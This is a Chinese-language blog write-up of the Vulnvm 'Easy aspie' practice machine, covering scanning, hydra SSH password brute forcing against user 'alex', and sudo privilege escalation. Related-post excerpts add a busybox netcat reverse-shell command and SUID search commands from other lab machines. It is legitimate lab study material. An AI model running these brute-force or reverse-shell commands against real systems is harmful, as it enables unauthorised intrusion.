Vulnvm-easy-aspie

发表于2025-07-23|更新于2025-07-29|靶机Vulnvm

|浏览量:

Vulnvm-Easy-aspie

先查找ip

1	arp-scan -l

进行端口扫描

1	nmap -sS -p- 192.168.220.144

PixPin_2025-07-07_15-35-27

发现 80、22端口

进入80端口，发现位默认界面

使用dirsearch进行扫描

PixPin_2025-07-07_15-36-06

访问

PixPin_2025-07-07_15-36-34

注意到Alex

哪就用这个名字爆破看看

1	hydra -l alex -P ./password.lst ssh://192.168.220.144 -V -I -e nsr

之前一直是听说，没有实际使用过

这里对各个参数详细解释下

参数介绍
-h 查看帮助菜单。
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户，对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
-P FILE 大写，指定密码字典。
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数，默认为16。
-V 显示详细过程。
-x -h 密码生成器帮助

也是成功爆出来了

ssh连接

1	ssh alex@192.168.220.144

接下来就是提权

1 2	sudo -l bash

文章作者: p3ngtop

文章链接: http://www.p3ng.top/2025/07/23/Vulnvm-Easy-aspie/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源肿眼泡の小站！

靶机 Easy Vulnvm 爆破ssh

相关推荐

群友靶机-Easy-Sneak

群友靶机-Easy-Sneak这回也是罕见的写出了群里大佬的靶机（虽然和其他师傅交流了下）当时写的时候因为是和其他师傅交流的，也是比较乱，所以这里写个文档理理思路信息收集Nmap Dirsearch User访问下来感觉找到的只有 http://192.168.198.250/cms/license.txt http://192.168.198.250/cms/install/login.php http://192.168.198.250/cms/.gitignore 倒是这个登录窗口怎么爆破都没消息其他目录全部找了一遍，啥也没有那没办法，只感觉这个license.txt有一点想法最开始试的时候倒是试了好久，因为第一行是逆序的，然后到二行也是逆序的，于是尝试将整个密钥全部逆序，但是第二行和最后一行又是正序的，所以全部逆又感觉不对劲，这个时候又想起来题目sneak（🐍）那可能就是要绕，那就试着绕一下，发现突然就绕通了（也是猜到了） Python 脚本 123456789101112131415161718192021222324252627282930313...

群友靶机-Easy-change

群友靶机-Easy-change1 信息收集12345678910111213141516┌──(root㉿kali)-[~]└─# nmap 10.22.23.140 -p- -sVStarting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 04:56 EDTNmap scan report for 10.22.23.140Host is up (0.00034s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))3306/tcp open mysql MariaDB 5.5.5-10.5.23MAC Address: 08:00:27:DC:2C:17 (PCS Systemt...

群友靶机-Low-5ud0

群友靶机-low-5ud0信息收集 Userhttp://192.168.198.190/textpattern/index.php 用dirsearch能扫到后台地址访问后是个登录窗口直接开爆之后就能够在这个接口上找到非常朴实无华的文件上传路径的话当时扫目录的时候扫到了一个/files，拼接一下也好猜或者直接去搜nday也行 Root然后kali 开 nc监听下 1nc -lvp 1234 1busybox nc 192.168.198.191 1234 -e /bin/bash 拿下www后，因为这里能直接看user的flag，感觉关键点应该不再另外一个用户上同时结合题目 5ud0 也不难猜出关键点是 sudo find看下有啥可用的 123find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \; 因为题目...

群友靶机-Low-Plugin

群友靶机-low-Plugin1 信息收集1.1 Nmap123456Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))MAC Address: 08:00:27:A2:03:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 1.2 Dirsearch123456Target: http://192.168.1.147/[16:09:34] 200 - 1KB - /about.php[16:09:37] 200 - 2KB - /feedback.php[16:09:37] 200 - 2KB - /home.php[...

群友靶机-Low-sky

群友靶机-Low-28-sky信息收集Nmap1234567Host is up (0.00052s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)80/tcp open http Apache httpd 2.4.62 ((Debian))MAC Address: 08:00:27:07:09:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirsearch12345678910Target: http://192.168.1.148/[19:16:59] Scanning:[19:17:03] 200 - 63B - /check.php[19:17:05...

群友靶机-Low-Paste

群友靶机-low-Paste信息收集 User01_FTP我们首先尝试访问 FTP 1ftp 10.22.23.149 发现直接泄露了一组账号密码 guest:guest 但是guest权限过低，没法上传和修改文件然后突然间发现，guest:guest 这个账号竟然能够连上 ssh！！！但是在guest界面没有看到flag，那接下来肯定是要进film的然后就开始到处翻，倒是啥也没看到 02_Web这个时候发现好像从到到尾没怎么注意过 web 端于是回过头去看web端 Web端是一个密码生成器，在主界面点击生成和复制后，会将密码生成至 /password.log 处那既然是密码生成器，反正又找不到其他东西，那就试试 film 的密码是不是这个然后就登上了。。。 1ssh film@10.22.23.149 1flag{user-f307bc02d0f7e60e52d128a0c27b8e34} Root先 sudo -l 看看有啥能用的 1sudo -l 发现 paste 能用去 GTFOBins 搜搜看...